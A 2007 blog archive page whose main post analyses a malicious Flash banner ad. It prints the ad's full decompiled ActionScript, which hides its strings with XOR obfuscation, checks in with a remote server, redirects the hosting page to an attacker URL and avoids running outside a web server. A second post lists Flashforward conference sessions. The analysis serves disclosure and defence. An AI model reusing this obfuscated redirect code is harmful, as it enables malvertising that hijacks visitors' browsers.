Archive for category Flash
De-constructing Malicious Flash
Posted by Barrett Sonntag in Flash, Website Analysis on November 22, 2007
Last Friday I was approached by my boss to look into an advertiser's banners due to reports of malware notifications when browsing our site. It sounded far-fetched to think that Flash was executing malicious code in client-side browsers, but I cracked open the SWF files with a de-compiler to take a look.
It was a mess; a little searching told me that it was probably encrypted by Amayeta SWF Encrypt, as seen from the review at Flash Valley. It turned out that my superiors had already confronted the client with the information that they suspected their ads of containing malware, and the client replied with a fixed version that they had just handed over to me to look at.
I wasn’t going to stop there though, and I found the original files to see if they matched. The file size of the originals was smaller, so I threw them through the de-compiler again and, lo, there was human-readable code. Why would the client send over fixed files that were obfuscated when the originals were not?
Here is the code that I found sitting in an unassuming movieclip with no content other than the single frame and ActionScript.
// Decompiled ActionScript 2 from the ad's hidden movieclip, re-flowed one statement
// per line for reading; the code itself is untouched, only comments are added.
// Every _root.cN value is hex ciphertext that is decoded only at runtime by
// String.prototype.color() below with the constant key 14688422, so a static
// string search of the SWF finds nothing readable. Decoded values noted below were
// obtained by running that decoder; those also visible in the trace output further
// down the post are marked (trace). Values only partly verified are hedged.
_root.c1 = "47ED02";                   // "get"  - HTTP method passed to loadVariables
_root.c2 = "46E91A247C";               // appears to decode to "false"  - expected emc.stats answer
_root.c3 = "7FF817257C8DF8";           // appears to decode to "_parent"  - navigation target
_root.c4 = "50E70523";                 // appears to decode to "post"  - method for LoadVars.send
_root.c5 = "7FD7153B7080E795EA776F";   // appears to begin with "__click"; not referenced below
_root.c6 = "48FC022723CCA3A8F36070509F2105CBA738D20F50A22FD09E2BB7495689293D5623312668";   // redirect URL; first 7 bytes equal c13 ("http://"); host not decoded here
_root.c7 = "11";                       // "1"  - flag: require the SWF to be served over http://
_root.c8 = "10";                       // "0"  - view-count threshold (0 disables the counter branch)
_root.c9 = "10";                       // "0"  - flag: hide the ad once the viewer was already redirected
_root.c10 = "11";                      // "1"  - flag: check in with the stats URL before redirecting
_root.c11 = "10";                      // "0"  - substr start
_root.c12 = "17";                      // "7"  - substr length
_root.c13 = "48FC022723CCA3";          // "http://" (trace)
_root.c14 = "10";                      // "0"  - flag: enable the time-zone filter (off in this sample)
_root.c15 = "0DB1";                    // "-9" - time-zone filter lower bound, hours from UTC
_root.c16 = "10";                      // "0"  - time-zone filter upper bound
_root.c17 = "48FC022723CCA3A7E67676518C201D9BA138D20F50A263C7922FAD031B923C634721342266E62EB8CBA9707F3088182CC3";   // stats/check-in URL; first 7 bytes equal c13 ("http://"); host not decoded here
_root.c18 = "14B8";                    // "40" (trace)  - max __fchk polls before giving up (40 x 100 ms = 4 s)
_root.c19 = "53ED17257A8BF8A5F66B774FCB73559FE6268157";   // SharedObject (Flash local storage) name; not decoded here
_root.c20 = "0F";                      // "/"  - SharedObject local path
_root.c21 = "11BF446F29D3BCFAAF";      // appears to decode to "172800000"  - re-arm interval in ms (48 h)
_root.c22 = "7FD7022D";                // "__tz" (trace)
_root.c23 = "7FFD043B";                // "_url" (trace)
_root.c24 = "53FD14246D91";            // "substr" (trace)
_root.c25 = "7FD7102363";              // "__ftz"; not referenced below
_root.c26 = "7FD7103B6F";              // "__flv" (trace)  - name of the redirect function
_root.c27 = "7FD710347188";            // "__fchk" (trace)  - name of the polling function
_root.c28 = "53ED1833";                // "send"  - LoadVars method used for the redirect
_root.c29 = "47ED0203708EE9B0F06B666C9C2317CAA0";   // "getTimezoneOffset" (trace)

// Rolling-XOR string decoder installed on every String. `this` is a hex string;
// each byte is XORed with bits 8-15 of a running key that advances through a
// linear congruential step (multiplier 52845, increment 22719 - the same pair used
// by the Adobe Type 1 eexec cipher, though without its ciphertext feedback; the
// modulus here is 2^24-1). Plaintext bytes above 127 are shifted by 848, the
// offset that maps the upper half of Windows-1251 onto Cyrillic, so any non-ASCII
// output is Cyrillic text. The trace() was added by the post's author to log each
// decoded string (see the output listing below the code).
String.prototype.color = function (eslogan) {
    var _loc3 = eslogan;   // running key, seeded with the caller's constant (14688422 everywhere)
    var result = "";
    var _loc1;             // byte offset into the hex string, advances by 2 hex digits
    var n;
    var _loc2;             // decoded character code
    _loc1 = 0;
    (n = this.length);
    while (_loc1 < n) {
        // operator precedence: parseInt(...) ^ ((_loc3 >> 8) & 255)
        _loc2 = parseInt(this.slice(_loc1, _loc1 + 2), 16) ^ _loc3 >> 8 & 255;
        if (_loc2 > 127) {
            _loc2 = _loc2 + 848;
        }
        result = result + String.fromCharCode(_loc2);
        _loc3 = (_loc3 * 52845 + 22719) % 16777215;
        _loc1 = _loc1 + 2;
    }
    trace(result);
    return (result);
};

// _root.__flv - starts the redirect sequence. Hides the ad, creates a helper clip
// "emc" and asks the stats URL (c17) for instructions with a "get" loadVariables;
// in AS2 the clip's own variables (here the timestamp u) travel with that request,
// and the URL-encoded response is expected to define emc.stats and emc.exp, which
// __fchk reads. It then polls __fchk every 100 ms. With c10 == "0" it would skip
// the check-in and call __fchk directly. `dt` is the Date created in the init
// block at the bottom of this listing.
_root[_root.c26.color(14688422)] = function () {
    var _loc1 = _root;
    _loc1._visible = false;
    _loc1.createEmptyMovieClip("emc", _loc1.getNextHighestDepth());
    _loc1.emc.u = dt.getTime();   // timestamp sent with the check-in request
    if (parseInt(_loc1.c10.color(14688422))) {
        _loc1.emc.loadVariables(_loc1.c17.color(14688422),_loc1.c1.color(14688422));
        _loc1.i = setInterval(_loc1[_loc1.c27.color(14688422)], 100);
        return;
    }
    _loc1[_loc1.c27.color(14688422)]();
};

// _root.__fchk - runs on the 100 ms timer. Once the server has answered
// stats == "false" (or the check-in is disabled), it stops the timer and performs
// the actual payload: new LoadVars().send(c6, "_parent", "post") navigates the
// PARENT browser window - the page hosting the ad - to the attacker's URL with a
// POST. It then stores uzhe = 1 (Russian "uzhe", "already") in a SharedObject so
// the same viewer is not redirected again, with an expiry of emc.exp days when the
// server supplies one. Any other stats value, or 40 polls (4 s) without an answer,
// gives up and shows the ad normally.
_root[_root.c27.color(14688422)] = function () {
    var _loc1 = _root;
    if (_loc1.emc.stats == _loc1.c2.color(14688422) || !parseInt(_loc1.c10.color(14688422))) {
        clearInterval(_loc1.i);
        // redirect of the hosting page: LoadVars.send(url, "_parent", "post")
        new LoadVars()[_loc1.c28.color(14688422)](_loc1.c6.color(14688422),_loc1.c3.color(14688422), _loc1.c4.color(14688422));
        so = SharedObject.getLocal(_loc1.c19.color(14688422),_loc1.c20.color(14688422));
        so.data.uzhe = _loc1.uzhe = 1;
        if (_loc1.emc.exp) {
            dt = new Date();
            cr = dt.getTime();
            so.data.expires = cr + _loc1.emc.exp * 24 * 60 * 60 * 1000;   // exp is a number of days
        }
        so.flush();
        return;
    }
    if (_loc1.emc.stats || --_loc1.lim == 0) {
        // with c9 == "0" the ad is always made visible again here
        _loc1._visible = !(_loc1.uzhe && parseInt(_loc1.c9.color(14688422)));
        clearInterval(_loc1.i);
    }
};

// One-time init; r guards against re-running on replay. Computes the viewer's UTC
// offset in hours into _root.__tz, then gates the whole routine on:
//   - lim (40) being non-zero;
//   - with c7 == "1": _root._url.substr(0, 7) == "http://", i.e. the SWF must be
//     running from a web server - presumably so a copy opened from a local file in
//     the player or a decompiler's preview behaves like a clean ad;
//   - with c14 == "1" it would also exclude viewers whose offset lies in [-9, 0]
//     hours; c14 is "0" here, so the time-zone filter is disabled.
// It then consults the SharedObject frequency cap: once the stored expiry has
// passed (or the view counter equals c8) it re-arms the expiry by c21 ms and calls
// __flv. On a fresh SharedObject `expires` and `view` are both undefined, so whether
// the first view passes this test depends on the player's undefined-to-number
// coercion - do not assume either way from reading alone. Note the cap lives in
// Flash local storage, which clearing browser cookies does not reset.
if (r == undefined) {
    r = 1;
    _root.uzhe = 0;
    _root.lim = parseInt(_root.c18.color(14688422));
    // _root.__tz = -new Date().getTimezoneOffset() / 60  (hours east of UTC)
    _root[_root.c22.color(14688422)] = -new Date()[_root.c29.color(14688422)]() / 60;
    if (parseInt(_root.c18.color(14688422)) && (!parseInt(_root.c7.color(14688422)) || _root[_root.c23.color(14688422)][_root.c24.color(14688422)](parseInt(_root.c11.color(14688422)), parseInt(_root.c12.color(14688422))) == _root.c13.color(14688422)) && (!parseInt(_root.c14.color(14688422)) || !(_root[_root.c22.color(14688422)] >= parseInt(_root.c15.color(14688422)) && _root[_root.c22.color(14688422)] <= parseInt(_root.c16.color(14688422))))) {
        dt = new Date();
        cr = dt.getTime();
        so = SharedObject.getLocal(_root.c19.color(14688422), _root.c20.color(14688422));
        _root.uzhe = so.data.uzhe;
        _root._visible = !(_root.uzhe && parseInt(_root.c9.color(14688422)));
        // view counting only when c8 > 1; c8 is "0" in this sample, so this branch is skipped
        if (parseInt(_root.c8.color(14688422)) > 1) {
            if (!so.data.expires) {
                so.data.expires = cr;
            }
            ++so.data.view;
        }
        if (cr > so.data.expires || so.data.view == parseInt(_root.c8.color(14688422))) {
            so.data.expires = cr + parseInt(_root.c21.color(14688422));   // re-arm ~48 h ahead
            so.flush();
            _root[_root.c26.color(14688422)]();   // __flv()
        }
        so.flush();
    }
}
false;   // decompiler artifact, no effect
Wow, it was like nothing I had ever seen before. I immediately stuck a trace at the end of the new String prototype for result to see just what types of information it was returning.
__flv
__fchk
40
__tz
getTimezoneOffset
40
1
7
0
_url
substr
http://
__flv
__fchk
The last two lines, __flv and __fchk, just kept repeating as the SWF played on. I turned to the search engines and started pasting parts of this code in to find someone else who had run into this. I turned up a txt file from the site Mike on Ads – Errorsafe. He even put together an example of what this type of code can do, if you look at the comments of that post or just visit it directly at http://mikeonads.com/errorsafe_test.html (just don’t click Yes when it prompts you to install stuff). As Mike pointed out, this is circumvented by the new security features in the Flash 9 player and by setting AllowScriptAccess false in the HTML embed / object code.
I wanted to document my experience with this mainly to give another source of reference, because Mike on Ads was the only reference to this code I could find, and I wasn’t able to find anyone who could explain just what this code wants to do with the user's browser.
Flashforward Roundup
Posted by Barrett Sonntag in Flash on September 23, 2007
Day One
Adobe Keynote (unofficial video)
Kevin Lynch, Adobe
ActionScript 3 for Designers
Rich Shupe, FMA
On the Road with Adobe AIR
Mike Chambers, Adobe
The Secret to Project Management for the Creative Studio
Daniel Schutzsmith, GraphicDefine
Branding via Social Media for the Interactive Artist and Small Agency (will be removed 09/28/07!)
Giovanni Gallucci
OOP for the Noob – What’s in the Box?
Peter Elst, MindStudio
Rediscovering Fun!
Aral Balkan
Flash Workflows in Creative Suite 3
Colin Smith, PhotoshopCAFE.com
Video Game Opportunities with Flash
John Say, Say Design, Inc.
Creating and Selling Your Mobile Flash Content
Bill Perry, Adobe Systems
Building and Architecting a Flex Application: A Case Study
Chafic Kazoun, Atellis
Day Two
Breakfast Session: Flash Output with QuarkXPress 7 and Quark Interactive Designer!
Matthias Guenther, Quark
Tame Your Game with CS3 and ActionScript 3
Jay Laird, Metaversal Studios
Stylizing Flex Applications
Joey Lott, The Morphic Group
Animation Tips and Tricks
Chris Georgenes, Mudbubble
AIR, Finetune Desktop, and the Circle of Engagement
Tony MacDonell, Teknision
Designers vs. Developers: How To Avoid Fights on the Playground
Marc Leuchner, Almighty
Matt Wright, ROKKAN
Real World Flash Design Recipes
Colin Smith, PhotoshopCAFE.com
The Art and Zen of Mobile Games Using Flash (no content yet)
Scott Janousek, Hooken Mobile
Advergaming: From Pitch to Production with Flash CS3
Samuel Rivello, Neopets, Inc., an MTVN Company
Day Three
Keynote: The Aesthetics of Computation
John Maeda, MIT Media Lab
AS3 Particle Effects – Now 1000% Extra FREE!
Seb Lee-Delisle, Plug-in Media
Papervision3D
Carlos Ulloa, Papervision3D
BitmapData and 3D Image Manipulation in AS3
Paul Ortchanian, Goodby Silverstein & Partners
AIR Outside of the Box
Keith Peters, BIT-101
Flash and Search Engine Optimization (will be removed 09/28/07!)
Giovanni Gallucci
Flex and AJAX
David Gassner, Bardo Technical Services
If you have any information about any of the other sessions please let me know!